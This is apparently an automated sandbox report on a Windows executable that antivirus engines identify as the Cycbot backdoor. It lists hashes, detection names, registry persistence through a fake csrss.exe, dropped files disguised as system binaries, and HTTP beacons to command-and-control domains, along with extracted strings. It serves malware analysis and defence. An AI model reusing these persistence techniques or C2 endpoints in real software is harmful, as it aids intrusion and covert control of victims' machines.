Analysis Date2014-10-09 13:16:53
MD55eed0baa47733cd14eab8c714a4679da
SHA19497588047b5a853e3fb0373cc3befa2e747851e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 70aa5462b79268fd92fcd903a36bd19a sha1: 40e614174cc56a3b6642af57a94fb28f8f0f0078 size: 132608
Section.rdata md5: 39268d995ca32110161c2f175c67e07b sha1: 6a947719261f77054dce183e3d44fb66fba3b766 size: 4096
Section.data md5: 8277d2a1bd8fabce05c6a2d18df62779 sha1: aa7909b4da5e9bfeef11c1c9fb9f596759fcaa69 size: 52224
Section.crt md5: 21be537f910dbec46b803a5e720540e3 sha1: 02d14ac3b01fe322dcaa2b4876efe8021351e070 size: 512
Timestamp2005-11-29 09:04:31
VersionPrivateBuild: 1291
PEhash0dc888ec37bcbbb156433c3c93a6d696ec4ae56d
IMPhash37ba33cb6a2c78c37c714cff044e1797
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-3312
AVDr. WebTrojan.DownLoader1.58142
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.JWH
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CAM
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Pakes.oli
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)no_virus
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.127342F6
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Trojan.Pakes
AVYara APTno_virus
AVZillya!Trojan.Pakes.Win32.9382

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSzonedg.com
Winsock DNSsharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSsharewareconnection.com
Type: A
216.240.159.81
DNSzonetf.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
HTTP GEThttp://sharewareconnection.com/images/ubar_0.jpg?tq=gJ4WK%2FSUh4TDhRMw9YLJiMSTUivqg4aEwpFEfqHXarVJ%2BQhhcHo%3D
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYj1ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYj1ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 216.240.159.81:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 141.8.225.80:80

Raw Pcap

Strings
.
....;

040904b0
1291
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
^0bu X2
,,3?rZT
"3S_5/
..&3tNj
=4).3'
4r]bpZb
5G?N0k
60PMG)
7w|,T?R
)[**>8
8il+DZ8
9]Zl69
~\a7e1$
ADVAPI32.dll
`aKa!q
AlphaBlend
=;az2	
.Bcciy
$b>JID+rh
'B!?tDm
CharNextA
CheckDlgButton
CloseHandle
CoCreateInstance
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateDialogParamA
CreateFontIndirectA
@.data
:dC']2
DeleteCriticalSection
DeleteObject
DestroyWindow
d/'fML6
DisableThreadLibraryCalls
D]NV:i
d{]pa+
_dX2!}
EnableWindow
EnterCriticalSection
EnumResourceNamesW
ExitProcess
_*f5Pn
Fe,?mV
fgA-7Id|yn
FindResourceA
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
GaFM;+
GDI32.dll
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDialogBaseUnits
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemInfo
GetSystemTimeAsFileTime
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
G'E\YA
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hhlAll
hhlFre
$.htl@
=hVn_8w
I[IcWpQ
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
%*|IRk4
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IsDialogMessageA
IsDlgButtonChecked
IsWindow
i#|'w"
JGeLf'
^Jh^?+<
JIKI[!
JMxy+9
Jnz)#.FZa
(/,+K$
}[$[K5J
KERNEL32.dll
K%K^GU
K,.M6:P
kuM;L#
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadLibraryExA
LoadResource
LockResource
lR;jG`3
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lstrlenW
LV)9cU
~MCFh<
MD\"vB
)M/)G'3l
MoveWindow
MSIMG32.dll
~>M)^tr
MulDiv
MultiByteToWideChar
^:)mY#&pn
mZ3#\q
-n	Th'
NYe.L]
ole32.dll
omI.MY
o,zwo,0
P5*hub
PathFindExtensionA
P[aWdI]
PcNj@ 0
Pj|UvG
*PKzK)g
$:pPmH
Q'4;'8
q^jZds
QueryPerformanceCounter
=Q*yLT!
R4s0\I
RaiseException
`.rdata
RE2>R=
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegSetValueExA
ReleaseDC
RQSx%Yw
RtlUnwind
S;9!Z>
sA!"	5
<sA-J6
*[S*Eg
SelectObject
SendMessageA
SetDlgItemTextA
SetFilePointer
SetHandleCount
SetHandleInformation
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SetWindowLongA
SHLWAPI.dll
ShowWindow
SizeofResource
#s<LLYi? 
StringFromGUID2
swpP2EI
	SzJQ)A*
t4X%D!+
*T}5F3.Y?
{\t9+jF
TerminateProcess
_t)ErU
*t?**H6
!This program cannot be run in DOS mode.
T$HPRj
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
\*tO`D
TransmitCommChar
TransparentBlt
"}u_a1
uFmQgdU
U\kFZE
U MMi#
UnhandledExceptionFilter
UnO\hT
UnregisterClassA
u*qu93
USER32.dll
U`@Th/
v0RT=Y.@
V[8PQH	
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
|}V'*u
~?W	*	
wF0q[g
WideCharToMultiByte
WinHelpA
WriteFile
WUTm5$
_Wxv53
>,X1b"
xUq]Cxxp
x_YiKvHa
~)[Y:b
Y+]nCM@Y
Y?v{VF
Zf|=tI
<>ZyRr